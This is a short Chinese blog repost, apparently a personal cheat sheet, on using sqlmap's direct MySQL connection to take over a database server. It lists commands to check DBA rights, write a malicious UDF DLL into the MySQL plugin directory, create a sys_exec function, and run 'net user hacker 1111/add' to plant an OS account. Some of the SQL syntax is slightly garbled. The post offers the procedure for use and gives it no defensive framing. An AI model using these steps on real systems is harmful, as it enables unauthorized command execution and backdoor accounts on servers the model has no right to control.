sqlmap极其详细查询文档
转自
https://www.cnblogs.com/waw/p/10828237.html
方便以后查询
sqlmap 直连数据库拿shell
需要已知当前用户名 --current-user 密码账号 --password
查看dba权限--is-dba
执行--sql-shell
查看版本:select @@version;
查询插件目录:select @@plugin dir;
写入小马文件:sqlmap -d "mysql://root:root@ip:3306/mysql" --file-write=本地文件路径(小马文件:/home/udf.dll) --file-dest 网站路径(写入路径)+"/写入的文件名"(格式:D://phpStudy//PHPTutorial//MySQL//lib//plugin//lib_mysqludfsys.dll) 其实就是将本地文件写进去
进入shell:create function sys_exec returns strings soname "lib_mysqludfsys.dll";
select sys_exec('net user hacker 1111/add')
x后面输入命令即可
作者:求知鱼
-------------------------------------------
个性签名:你有一个苹果,我有一个苹果,我们交换一下,一人还是只有一个苹果;你有一种思想,我有一种思想,我们交换一下,一个人就有两种思想。
如果觉得这篇文章对你有小小的帮助的话,记得在右下角点个“推荐”哦,博主在此感谢!
独学而无友,则孤陋而寡闻,开源、分享、白嫖!
